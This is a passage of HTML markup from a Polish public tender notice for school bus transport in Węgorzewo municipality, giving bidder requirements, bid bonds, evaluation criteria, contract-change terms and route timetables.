id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Tak</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Ważna licencja na wykonywanie krajowego transportu osób zgodnie z ustawą o transporcie drogowym.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Dokumenty poświadczające, że: 1)	dysponuje lub będzie dysponował na czas realizacji zamówienia aktualnie zarejestrowanymi, posiadającymi aktualne przeglądy techniczne i ubezpieczenie pojazdami w ilościach: a)	co najmniej 4 pojazdami przystosowanym do wykonywania przewozów uczniów w przypadku składania oferty na część I zamówieniab)	co najmniej 2 pojazdami przystosowanymi do wykonywania przewozów uczniów w przypadku składania oferty na część II zamówienia c)	co najmniej 1 pojazdem przystosowanym do wykonywania przewozów uczniów w przypadku składania oferty na część III zamówienia d)	co najmniej 2 pojazdami przystosowanymi do wykonywania przewozów uczniów w przypadku składania oferty na część IV zamówienia e)	co najmniej 9 pojazdami przystosowanymi do wykonywania przewozów uczniów w przypadku składania oferty na wszystkie części Pojazdy, o których mowa w punkcie III podpunkt 1 muszą spełniać następujące wymagania w zakresie ilości miejsc:a)	Dla Części I: o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 18 w pierwszym pojeździe, o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 26 w drugim pojeździe oraz o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 60 w kolejnych dwóch pojazdach, przy czym -w jednym pojeździe o łącznej liczbie miejsc 28 a w drugim o łącznej liczbie miejsc 32,b)	dla Części II o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 14 w pierwszym pojeździe i o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 7 w drugim pojeździe,c)	dla Części III o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 54 w jednym pojeździe d) dla Części IV o łącznej liczbie miejsc pasażerów z kierowcą i opiekunem co najmniej 52 w dwóch pojazdach, przy czym -w jednym pojeździe o łącznej liczbie miejsc 29 a w drugim o łącznej liczbie miejsc 23,2)	Dysponują osobami zdolnymi do wykonania zamówienia: tj. Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponować na czas realizacji zamówienia opiekunami oraz kierowcami posiadającymi kwalifikacje do kierowania pojazdami przeznaczonymi do przewozu osób. Ilość opiekunów i kierowców, którymi dysponuje Wykonawca musi odpowiadać liczbie pojazdów wykazanych na poszczególne części zadania, według zasady jeden opiekun i kierowca w jednym pojeździe. Przez osobę opiekuna rozumie się osobę, która nie kieruje pojazdem. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji">Dokumenty poświadczające, że jest ubezpieczony od odpowiedzialności cywilnej w związku z prowadzoną działalnością gospodarczą zgodną z przedmiotem zamówienia na sumę gwarancyjną min. 60 000,00 PLN w przypadku składania ofert na min. 1 do max. 2 części lub 120 000,00 PLN na 3 i więcej części. Fakt opłacenia polisy musi wynikać z jej treści lub innego załączonego dokumentu.</span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Wykonawca przedstawi dokumenty opisane w SIWZ.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wykonawca jest zobowiązany do wniesienia wadium (dla każdej części odrębnie) w wysokości a)	Dla części I - 800 zł,b)	Dla części II - 500 zł,c)	Dla części III - 200 zł,d)	Dla części IV -500 zł.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>?	Ilość kilometrów przewozów nieodpłatnych</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin płatności faktury</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">25.12	Zamawiający przewiduje wprowadzenie następujących zmian w umowie:1)	w zakresie liczby dowożonych i odwożonych uczniów,2)	w zakresie dni i godzin przewozu uczniów stosownie do zmiany planu zajęć i organizacji roku szkolnego,3)	w zakresie zmiany trasy przewozu oraz punktów zbornych - przystanków, terminów i godzin wykonywania przewozów,4)	w razie zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia,5)	dokładniejszego doprecyzowania zapisów umowy,6)	wprowadzenia zmian korzystnych dla Zamawiającego, w szczególności obniżenia kosztów zadania lub podwyższenia standardu wykonywanego zadania.7)	w czasie realizacji zawartej umowy, ustalona w planie dowożenia trasa, kolejność punktów zbornych (przystanków) oraz godziny odjazdów mogą być zmienione przez Zamawiającego celem dostosowania trasy do potrzeb uczniów i placówek oświatowych. W przypadku zmian Zamawiający i Wykonawca opracują nowy harmonogram dowozu. W przypadku konieczności zmiany trasy, lokalizacji przystanku lub punktu zbornego wykonawca zobowiązany będzie niezwłocznie podjąć niezbędne działania w celu uzyskania przewidzianych prawem zgód, uzgodnień i zezwoleń.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-01-07</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:15</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Przewozy szkolne uczniów do szkół w gminie Węgorzewo do 30.06.2019 r. </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część I-trasa 1 -dowóz do szkół w Węgorzewie -SP nr 1, SP nr 2, Przedszkola nr 1, Przedszkola nr 2: 1.SP 1: Ogonki - ul. Pionierów -do 10 km; Kolonia Rybacka-ul. Pionierów -do 10 km; Razem: 16, w tym: 16 biletów do 10 km. Harmonogram trasy-Dowóz (1 kurs)-Przystanek 1:Ogonki I-7.23; Przystanek 2: Ogonki II-7.25; Przystanek 3: Kolonia Rybacka-7.26; Przystanek 4: : Węgorzewo III ul. Pionierów-7.45. Rozwóz (2 kursy): Przystanek 1: Węgorzewo III ul. Pionierów- 12.85 i 15.38; Przystanek 2: Kolonia Rybacka- 13.10 i 15.50; Przystanek 3: Ogonki I- 13.12 i 15.52; Przystanek 4: Ogonki II - 13.15 i 15.55.trasa 2- dowóz do szkół w Węgorzewie do SP 1,SP 2, Przedszkola nr 1; 1.Stręgiel-Węgorzewo ul. Kraszewskiego -do 10 km - 8 b. Stręgiel - Węgorzewo ul. Pionierów - 1 b. 2. Matyski-Węgorzewo ul. Kraszewskiego- do 10 km-4 b.; 3. Kalskie Nowiny-Węgorzewo ul. Kraszewskiego-10 b. - do 5 km ;. Kalskie Nowiny- Węgorzewo ul. Pionierów- do 10 km -1 b. Węgorzewo-Trygort kolonia rozwóz -do 5m -1 b. Węgorzewo -Trygort rozwóz -do 10 km-12 b. Węgorzewo Stawki rozwóz do 15 km - 1 b. Węgorzewo - Przystań rozwóz do 20 km -1 b. Razem 39 b: w tym 24 dowóz i rozwóz - 14 do 10 km; 10 do 5 km; oraz 15 tylko rozwóz  1/2  b. - 1 do 5km, 12 do 10 km, 1 do 15 km, 1 do 20 km.Harmonogram trasy- Przystanek 1: Stręgiel I -7.15; Przystanek 2: Matyski- 7.18; Przystanek 3: Stręgiel II -7.20; Przystanek 4: Kalskie Nowiny III - 7.25; Przystanek 5: Kalskie Nowiny II- 7.29; Przystanek 6: Kalskie Nowiny I -7.31; Przystanek 7: Węgorzewo ul. Bema-7.35; Przystanek 8: Węgorzewo ul. Kraszewskiego SP 2 -7.40; Przystanek 9: Węgorzewo ul. Pionierów-7.45. Rozwóz (1 kurs)- Przystanek 1: Węgorzewo I ul. Pionierów-14.45/15.30*; Przystanek 2: Węgorzewo II ul. Kraszewskiego- 14.48/15.33*; Przystanek 3: Węgorzewo ul. Bema-14.50/15.35*; Przystanek 4: Kalskie Nowiny I kolonia-14.53/15.38*; Przystanek 5: Kalskie Nowiny II wieś-14.56/15.41*; Przystanek 6: Kalskie Nowiny III przystanek na żądanie-14.58/15.43*; Przystanek 7: Stręgiel kolonia-15.05/15.50*; Przystanek 8: Matyski-15.07/15.52*; Przystanek 9: Stręgiel II- 15.09/15.55*. Przystanek 10: SP 2 15,50; Przystanek 11: SP1-15.55. Przystanek 12: Trygort kol. 16.00. Przystanek 13: Trygort kol. II-16.08. Przystanek 14: Trygort I- 16.10. Przystanek 15: Trygort II- 16.12. Przystanek 16: Trygort III- 16.13. Przystanek 17: Stawki I- 16.15. Przystanek 18: Stawki II- 16.25. Przystanek 19: Przystań - 16.25 (*godziny odjazdu od wtorku do piątki i w poniedziałki)Trasa 3: - dowóz do szkół w Węgorzewie do SP 1,SP 2, Przedszkola nr 1 i SOSW w Węgorzewie. 1.Czerwony Dwór - Węgorzewo ul. Kraszewskiego i Pionierów -do 5 km; 2.Wysiecza - Węgorzewo ul. Kraszewskiego, Bema i Pionierów- do 5 km; 3.Jakunowo - Węgorzewo -do 10 km; 4.Stulichy - Węgorzewo- do 5 km; 5.Wilkowo - Węgorzewo- do 10 km; 6. Maćki - Węgorzewo- do 5 km; 7. Prynowo-Węgorzewo -do 10 km; ;. Razem: 56 biletów, w tym 38 do 5 km i 18 do 10 km. Harmonogram trasy: Dowóz I (1 kurs): Przystanek 1: Wilkowo I - 7.15; Przystanek 2:Wilkowo II-7.19; Przystanek 3:Prynowo I-7.24 ; Przystanek 4:Prynowo II -7.28; Przystanek 5:Prynowo III-7.30; Przystanek 6: Prynowo IV- 7.32; Przystanek 7:Maćki -7.35; Przystanek 8: Maćki II- 7.36; Przystanek 9: Węgorzewo ul. Targowa; Przystanek 10: SP 1 ul. Pionierów -7.41; Przystanek 11: SP 2- 7.45. Dowóz II (1 kurs): Przystanek 1: Czerwony Dwór I-7.10; Przystanek 2: Czerwony Dwór II-7.12; Przystanek 3: Czerwony Dwór III-7.14; Przystanek 4: Czerwony Dwór IV-7.16; Przystanek 5: Czerwony Dwór V-7.18; Przystanek 6: Wysiecza I-7.20; Przystanek 7:Wysiecza II-7.23; Przystanek 8: Jakunowo-7.30; Przystanek 9: Stulichy I-7.35; Przystanek 10: Stulichy II -7.37; Przystanek 11: Maćki I-7.39; Przystanek 12: Maćki II- 7.40; Przystanek 13; Węgorzewo ul. Targowa; Przystanek 14: SP 1 ul. Pionierów-7.43; Przystanek 15: SP 2 ul. Kraszewskiego-7.45. Rozwóz (2 kursy): Przystanek 1: SP 2 ul. Kraszewskiego- 13.45 i 15.25; Przystanek 2: SP1 ul. Pionierów- 13.50 i 15.30; Przystanek 3: ul. Targowa - 14.02 i 15.37. Przystanek 4: Czerwony Dwór I- 14.00 i 15.35; Przystanek 5: Czerwony Dwór II- 14.10 i 15.45; Przystanek 6: Czerwony Dwór III- 14.10 i 15.45; Przystanek 7: Czerwony Dwór IV- 14.10 i 15.45; Przystanek 8: Czerwony Dwór V- 14.10 i 15.45; Przystanek 9: 